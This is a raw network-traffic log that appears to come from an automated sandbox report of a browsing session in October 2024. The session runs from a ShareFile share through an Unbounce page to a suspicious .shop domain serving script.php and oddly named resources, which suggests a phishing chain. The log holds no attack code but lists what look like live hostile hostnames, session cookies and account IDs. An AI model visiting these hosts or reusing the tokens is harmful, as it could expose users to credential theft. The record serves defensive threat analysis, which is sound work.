            Source: global trafficHTTP traffic detected: GET /m/bxg/8E4FPBTMKDVQ7J1X70XYU2X3S HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/jx/XCOMR0LVXHD2CSC9IZW3DTEPG HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/mxl/mlg.svg?RHI7QEQ4V0EAB9E08G4TRBZQT HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/mxl/sig_op.svg HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/aty/L1BEWKG1JFCBQ5TPZV5GTTZQD HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/ecpt/8SP5UFUDB7ATU5HVLW4D116DG HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/ic/RURBAM6XT5AFWTUO9JJWXDBG5 HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/script.php HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/ic/RURBAM6XT5AFWTUO9JJWXDBG5 HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /99392004001023/ HTTP/1.1Host: unbouncepages.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /99392004001023/ HTTP/1.1Host: unbouncepages.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_ub/static/ts/e6c35f50fd3355ae56cc4292c3ae66e2e57ced28.js HTTP/1.1Host: unbouncepages.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://unbouncepages.com/99392004001023/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ubvs=984ef446-4894-43d3-86b3-f7f03d0fb80e; ubvt=v2%7C984ef446-4894-43d3-86b3-f7f03d0fb80e%7Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012%3Aa%3Asingle%3Asingle; __cf_bm=na6y8zAWEEPd_WLfIs3pLGcfi8Vd1ydOe7voOG5uk04-1728497213-1.0.1.1-EYMXS1taezGgDDe3SggsgK5J86VdxHU_mJBouxY9Uxucl4vkgcCZjQD6GuXseSnmOSL3savSTNGz2ucgc_iq.Q
            Source: global trafficHTTP traffic detected: GET /published-css/main-ebbfc5e.z.css HTTP/1.1Host: builder-assets.unbounce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://unbouncepages.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /published-js/main.bundle-ef43f79.z.js HTTP/1.1Host: builder-assets.unbounce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://unbouncepages.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /_ub/static/ts/e6c35f50fd3355ae56cc4292c3ae66e2e57ced28.js HTTP/1.1Host: unbouncepages.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: ubvs=984ef446-4894-43d3-86b3-f7f03d0fb80e; ubvt=v2%7C984ef446-4894-43d3-86b3-f7f03d0fb80e%7Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012%3Aa%3Asingle%3Asingle; __cf_bm=na6y8zAWEEPd_WLfIs3pLGcfi8Vd1ydOe7voOG5uk04-1728497213-1.0.1.1-EYMXS1taezGgDDe3SggsgK5J86VdxHU_mJBouxY9Uxucl4vkgcCZjQD6GuXseSnmOSL3savSTNGz2ucgc_iq.Q
            Source: global trafficHTTP traffic detected: GET /published-js/main.bundle-ef43f79.z.js HTTP/1.1Host: builder-assets.unbounce.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
            Source: global trafficDNS traffic detected: DNS query: premierbb.sharefile.com
            Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.us-east-1.sdk.awswaf.com
            Source: global trafficDNS traffic detected: DNS query: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: app.launchdarkly.com
            Source: global trafficDNS traffic detected: DNS query: premierbb.sf-api.com
            Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-content.customer.pendo.io
            Source: global trafficDNS traffic detected: DNS query: piletfeed-cdn.sharefile.io
            Source: global trafficDNS traffic detected: DNS query: o49063.ingest.sentry.io
            Source: global trafficDNS traffic detected: DNS query: events.launchdarkly.com
            Source: global trafficDNS traffic detected: DNS query: js-agent.newrelic.com
            Source: global trafficDNS traffic detected: DNS query: bam.nr-data.net
            Source: global trafficDNS traffic detected: DNS query: citrix-sharefile-data.customer.pendo.io
            Source: global trafficDNS traffic detected: DNS query: sf-cv.sharefile.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: sf-renderx-us-east-1.sharefile.com
            Source: global trafficDNS traffic detected: DNS query: sf-temp-us-east-1-production.s3.amazonaws.com
            Source: global trafficDNS traffic detected: DNS query: storage-cf-us.sharefile.com
            Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
            Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
            Source: global trafficDNS traffic detected: DNS query: unbouncepages.com
            Source: global trafficDNS traffic detected: DNS query: builder-assets.unbounce.com
            Source: global trafficDNS traffic detected: DNS query: hvhuo1.timesbella.com
            Source: global trafficDNS traffic detected: DNS query: hrv56k8ryi.ferrovelho.shop
            Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
            Source: unknownHTTP traffic detected: POST /0093b71e39a6/478ed03bbf12/verify HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveContent-Length: 8680sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://premierbb.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 18:05:35 GMTContent-Length: 0Connection: closeSet-Cookie: AWSALBTG=q1Qp4nMZXWbsDg/0EsBMeuqqx/nwubwCEClHjE69GDApd5aCPyPQGFJ0QxDQORvmlC1N/VuBdY+VvTC2wLf+KcJI4hX7V9r26YLnAPYtQae+6xPyJ5JEc/N2XHBtjGFrhQVEeYi5YOmiopVCC+dAfOvDXkuZebOvn1GTKxk0yESW; Expires=Wed, 16 Oct 2024 18:05:35 GMT; Path=/Set-Cookie: AWSALBTGCORS=q1Qp4nMZXWbsDg/0EsBMeuqqx/nwubwCEClHjE69GDApd5aCPyPQGFJ0QxDQORvmlC1N/VuBdY+VvTC2wLf+KcJI4hX7V9r26YLnAPYtQae+6xPyJ5JEc/N2XHBtjGFrhQVEeYi5YOmiopVCC+dAfOvDXkuZebOvn1GTKxk0yESW; Expires=Wed, 16 Oct 2024 18:05:35 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=1ojIM2AmY8RvcL8lJLQZ4lF5JXtAJ0xYzT2A5wJfBKs0NlJjY+80+632BoZ/aWOhue9ppWqqF833tFzGxlcNUacVFEwHq6Yp4IpJ5sUvTp8ytXjs0l7FZzpFGoYI; Expires=Wed, 16 Oct 2024 18:05:35 GMT; Path=/Set-Cookie: AWSALBCORS=1ojIM2AmY8RvcL8lJLQZ4lF5JXtAJ0xYzT2A5wJfBKs0NlJjY+80+632BoZ/aWOhue9ppWqqF833tFzGxlcNUacVFEwHq6Yp4IpJ5sUvTp8ytXjs0l7FZzpFGoYI; Expires=Wed, 16 Oct 2024 18:05:35 GMT; Path=/; SameSite=None; SecureCache-Control: no-store, must-revalidate, no-cache, privateContent-Language: enExpires: 0Pragma: no-cacheX-XSS-Protection: 1;mode=blockReferrer-Policy: same-originStrict-Transport-Security: max-age=16000000;includeSubDomains;preloadX-Content-Type-Options: nosniff
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 18:05:37 GMTContent-Type: application/json; charset=utf-8Content-Length: 93Connection: closeSet-Cookie: AWSALBTG=uecGq8wHNEpuwtT1CNqQI8uWAP1fDEc9h39SD0ppZr9p977HxwjIXYicgYYY/vjDpxJSUC7yigENJaBQYzDgARu2O1N+WhmlNwXnwFz8ezON9iJs1za3pntO0u6bfognpqvWVPsG2kb8g1itACQrbOGznnKhvNP7e4ec1FxIGq8+; Expires=Wed, 16 Oct 2024 18:05:37 GMT; Path=/Set-Cookie: AWSALBTGCORS=uecGq8wHNEpuwtT1CNqQI8uWAP1fDEc9h39SD0ppZr9p977HxwjIXYicgYYY/vjDpxJSUC7yigENJaBQYzDgARu2O1N+WhmlNwXnwFz8ezON9iJs1za3pntO0u6bfognpqvWVPsG2kb8g1itACQrbOGznnKhvNP7e4ec1FxIGq8+; Expires=Wed, 16 Oct 2024 18:05:37 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=jjMmNuQm+1Zv97SjZrOWVQrMLMf6fRbByoETIrkxQ0lbtaCmWUf/3OWXKGf2nnm0Y78BtgoOFSj+ViAp8vkF0FVlhHntESfqROCHOtk4XU8gI89ennCy5I6iRM/w; Expires=Wed, 16 Oct 2024 18:05:37 GMT; Path=/Set-Cookie: AWSALBCORS=jjMmNuQm+1Zv97SjZrOWVQrMLMf6fRbByoETIrkxQ0lbtaCmWUf/3OWXKGf2nnm0Y78BtgoOFSj+ViAp8vkF0FVlhHntESfqROCHOtk4XU8gI89ennCy5I6iRM/w; Expires=Wed, 16 Oct 2024 18:05:37 GMT; Path=/; SameSite=None; SecureCache-Control: no-store, no-cacheContent-Language: enExpires: Tue, 08 Oct 2024 18:05:37 GMTCitrix-TransactionId: 7a1221fd-bb79-4775-a21c-7b964de568b6CorrelationId: P0NJmDxEJkuaBLCXhpRGjAX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Robots-Tag: noindexX-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: AXYlH2uevEW455ERZfHd2w
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 18:05:38 GMTContent-Type: application/json; charset=utf-8Content-Length: 143Connection: closeSet-Cookie: AWSALBTG=YX2Bi5ClpfEcoYO3pRNB5IzkJtc9wO0L+PAL6sr9aTyYawDrEKBhopMZMHwxMnauwVDcG+utAE0C9vZEbSpHuwH3C+C/cEKfH66iGRHTHmx8Bp6rgZVZ1z046zHRiG3OyyPN1+oQ6ewN8/mrJNa6zQS+jgdO6rm0tR0Ca46tjQ2D; Expires=Wed, 16 Oct 2024 18:05:38 GMT; Path=/Set-Cookie: AWSALBTGCORS=YX2Bi5ClpfEcoYO3pRNB5IzkJtc9wO0L+PAL6sr9aTyYawDrEKBhopMZMHwxMnauwVDcG+utAE0C9vZEbSpHuwH3C+C/cEKfH66iGRHTHmx8Bp6rgZVZ1z046zHRiG3OyyPN1+oQ6ewN8/mrJNa6zQS+jgdO6rm0tR0Ca46tjQ2D; Expires=Wed, 16 Oct 2024 18:05:38 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=SDiHrJosfItDLTW1O8SQ9jwYFu9CU8cfZF7IvWqVFHTp3ZnMchwL65/ZTHZTbEINZdNEbTMsZImlxRJZ9eKdY3lVRQHS/UXPcMhyGaPu3A6POdtnik7klFJNUQ1O; Expires=Wed, 16 Oct 2024 18:05:38 GMT; Path=/Set-Cookie: AWSALBCORS=SDiHrJosfItDLTW1O8SQ9jwYFu9CU8cfZF7IvWqVFHTp3ZnMchwL65/ZTHZTbEINZdNEbTMsZImlxRJZ9eKdY3lVRQHS/UXPcMhyGaPu3A6POdtnik7klFJNUQ1O; Expires=Wed, 16 Oct 2024 18:05:38 GMT; Path=/; SameSite=None; SecureCache-Control: no-cache,no-storeExpires: -1Pragma: no-cacheX-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: CytjqaUsF0SgXmlkh9cViQ
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 18:05:39 GMTContent-Type: application/json; charset=utf-8Content-Length: 143Connection: closeSet-Cookie: AWSALBTG=/1sLx+WFi8qCXjY7fp01c6IWLH/QaDpH6zhAoTyAVTS3qYoPE2Fj+3hiswQIcrjDdmVKiRwaLUmlS83hmzWBQGKn/SH6V6lxSwIVE51GDd1RZ0bWq8vQSs2YeDdnAOWY+NCc/Uxc6ZeihwGq0+8ljGgYL4qRqE8tARx9az4NRJ+e; Expires=Wed, 16 Oct 2024 18:05:39 GMT; Path=/Set-Cookie: AWSALBTGCORS=/1sLx+WFi8qCXjY7fp01c6IWLH/QaDpH6zhAoTyAVTS3qYoPE2Fj+3hiswQIcrjDdmVKiRwaLUmlS83hmzWBQGKn/SH6V6lxSwIVE51GDd1RZ0bWq8vQSs2YeDdnAOWY+NCc/Uxc6ZeihwGq0+8ljGgYL4qRqE8tARx9az4NRJ+e; Expires=Wed, 16 Oct 2024 18:05:39 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=j2hBEYCKBMRxcB/4e1moxSRiflSj/VGGA4eRDyb3xDP5xKTxakKaInih+XdpVjQ6XIUhiihcXf/aH3uECQ7Z8I+WBap2toLAez0Ij2YnEIubjYuQHXSG5l6cQUrH; Expires=Wed, 16 Oct 2024 18:05:39 GMT; Path=/Set-Cookie: AWSALBCORS=j2hBEYCKBMRxcB/4e1moxSRiflSj/VGGA4eRDyb3xDP5xKTxakKaInih+XdpVjQ6XIUhiihcXf/aH3uECQ7Z8I+WBap2toLAez0Ij2YnEIubjYuQHXSG5l6cQUrH; Expires=Wed, 16 Oct 2024 18:05:39 GMT; Path=/; SameSite=None; SecureCache-Control: no-cache,no-storeExpires: -1Pragma: no-cacheX-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: IchsULbPl0uoBHYJYXVzAg
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 18:05:42 GMTContent-Type: application/json; charset=utf-8Content-Length: 143Connection: closeSet-Cookie: AWSALBTG=eAfl5fTxZ4HsumjiKEdoMP5QeL8gEzoM0XDGToutgEaR+CAdKdf9g50myPgjAjo2FCuOZnXuSf++GWHj71/uupvK/bLDeshZN211V2T9w65rMgI5N8xvBr+zfzVyjF1nGLfvtPacs4FGF48BJpCw8Ge8x2YU1gzdo2x+Zk9lHQHx; Expires=Wed, 16 Oct 2024 18:05:42 GMT; Path=/Set-Cookie: AWSALBTGCORS=eAfl5fTxZ4HsumjiKEdoMP5QeL8gEzoM0XDGToutgEaR+CAdKdf9g50myPgjAjo2FCuOZnXuSf++GWHj71/uupvK/bLDeshZN211V2T9w65rMgI5N8xvBr+zfzVyjF1nGLfvtPacs4FGF48BJpCw8Ge8x2YU1gzdo2x+Zk9lHQHx; Expires=Wed, 16 Oct 2024 18:05:42 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=ZcbUzsToBDLFyg3ntehfeG8HihHezENx4cUws8ICmvwmGhD7jvcNZHOsDpt64lsjlXE2l0gO85iRe+7NvEkE1Xk11jUazRyUycmhLPZV023Xnt1G2l1eUBrYxi1M; Expires=Wed, 16 Oct 2024 18:05:42 GMT; Path=/Set-Cookie: AWSALBCORS=ZcbUzsToBDLFyg3ntehfeG8HihHezENx4cUws8ICmvwmGhD7jvcNZHOsDpt64lsjlXE2l0gO85iRe+7NvEkE1Xk11jUazRyUycmhLPZV023Xnt1G2l1eUBrYxi1M; Expires=Wed, 16 Oct 2024 18:05:42 GMT; Path=/; SameSite=None; SecureCache-Control: no-store, no-cacheContent-Language: enExpires: Tue, 08 Oct 2024 18:05:42 GMTCitrix-TransactionId: bbd4589d-79f0-4455-b923-e72743c3e6c8CorrelationId: TMqwLfzOikGgVQlpKUHnjAX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Robots-Tag: noindexX-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: QUyUQFLSoUy2qMZfzsjP1g
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 09 Oct 2024 18:05:54 GMTContent-Type: application/json; charset=utf-8Content-Length: 143Connection: closeSet-Cookie: AWSALBTG=5Wgc5odJra0+Nkpdl85h4IiEugPYE0iGwU3NAn2dNYh6PJPTe832Ti6AOLmZ/w43vF5TJdHt4cnM9V/8MfSfZDCVuF/GGuMmKSQGKnUyB4hs1cAKHTACPeQ3V83zfOQy9w+WRQrPLuaCwJjDYx7dYKMeLhGeKy8rq3XgwOp/n7s3; Expires=Wed, 16 Oct 2024 18:05:54 GMT; Path=/Set-Cookie: AWSALBTGCORS=5Wgc5odJra0+Nkpdl85h4IiEugPYE0iGwU3NAn2dNYh6PJPTe832Ti6AOLmZ/w43vF5TJdHt4cnM9V/8MfSfZDCVuF/GGuMmKSQGKnUyB4hs1cAKHTACPeQ3V83zfOQy9w+WRQrPLuaCwJjDYx7dYKMeLhGeKy8rq3XgwOp/n7s3; Expires=Wed, 16 Oct 2024 18:05:54 GMT; Path=/; SameSite=None; SecureSet-Cookie: AWSALB=YoTvKXxEctcs/7j93tHzVHJ03BulDxmJQFmdrZO2ophWkuNVyKsNlJ4gAd0oiz4ioyzFbAWGDHsgEkveldojYxi0CSE2cefHgpd7oOeix9C2WccOeRSwVBfFl0XD; Expires=Wed, 16 Oct 2024 18:05:54 GMT; Path=/Set-Cookie: AWSALBCORS=YoTvKXxEctcs/7j93tHzVHJ03BulDxmJQFmdrZO2ophWkuNVyKsNlJ4gAd0oiz4ioyzFbAWGDHsgEkveldojYxi0CSE2cefHgpd7oOeix9C2WccOeRSwVBfFl0XD; Expires=Wed, 16 Oct 2024 18:05:54 GMT; Path=/; SameSite=None; SecureCache-Control: no-cache,no-storeExpires: -1Pragma: no-cacheX-SFAPI-AccountId: a8050891-1b71-8816-99a8-d7f55d4cb952X-SFAPI-OAuthClientId: X-SFAPI-AppCode: _NoneX-SFAPI-RequestID: gkGa24eR8UyxlGITI9G-0g
            Source: chromecache_469.2.dr, chromecache_453.2.drString found in binary or memory: http://premierbb.sharefile.com/share/view/189361297164461c
            Source: 2D85F72862B55C4EADD9E66E06947F3D0.10.drString found in binary or memory: http://x1.i.lencr.org/
            Source: chromecache_489.2.drString found in binary or memory: https://acctcdn.msauth.net/images/clear1x1.png
            Source: chromecache_426.2.dr, chromecache_501.2.drString found in binary or memory: https://agent.pendo.io/licenses
            Source: chromecache_426.2.dr, chromecache_501.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/agent/static/74b07336-7560-45fc-7cd1-95032a784d52
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/DGXiXepNeRvpgcvqVVwgerMyl9c/FzHL74W
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/RKXGQO-T4hA-4ZEVZHET-2hQSkA/2qzaI4Q
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/WPvkzGkOrfIvp3qkN5N54f_1PEk/YiOA-0Y
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6A
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/freMllnYvBAwsP7Q8plLkQuQk9o/iIvmdJJ
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/jfhRXEM-T3XDOIl2P_kjewAdeGc/LhZTKWo
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/kRiIYerdgZdzqYlUiCx61iLjnBU/vJf7TMD
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/mfS2ulYoG7dN1QSakrLPIk6LA7Q/4_xFPLt
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/moENhVNGkRpdnhKRCzqkG8MUQPk/Mp9uRb2
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/njPoQ1-6YEZw5vUbZJ0_GVUQ91Y
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/qgx_AaYBkGN6StQWJLhgBhCmZsY/ZEFqtCH
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWAD
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/wotSbq5SNToNGIBxeYKbdsIn35Q
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide-content/z6GAMp5KCypHWLnasLOIn0RVcPQ/vzuAMPt
            Source: chromecache_453.2.drString found in binary or memory: https://citrix-sharefile-content.customer.pendo.io/guide.-323232.1622565221517.css
            Source: chromecache_508.2.dr, chromecache_459.2.dr, chromecache_482.2.drString found in binary or memory: https://getbootstrap.com/)
            Source: chromecache_508.2.dr, chromecache_459.2.dr, chromecache_482.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
            Source: chromecache_508.2.dr, chromecache_482.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
            Source: chromecache_426.2.dr, chromecache_501.2.drString found in binary or memory: https://pendo-static-5352587489443840.storage.googleapis.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
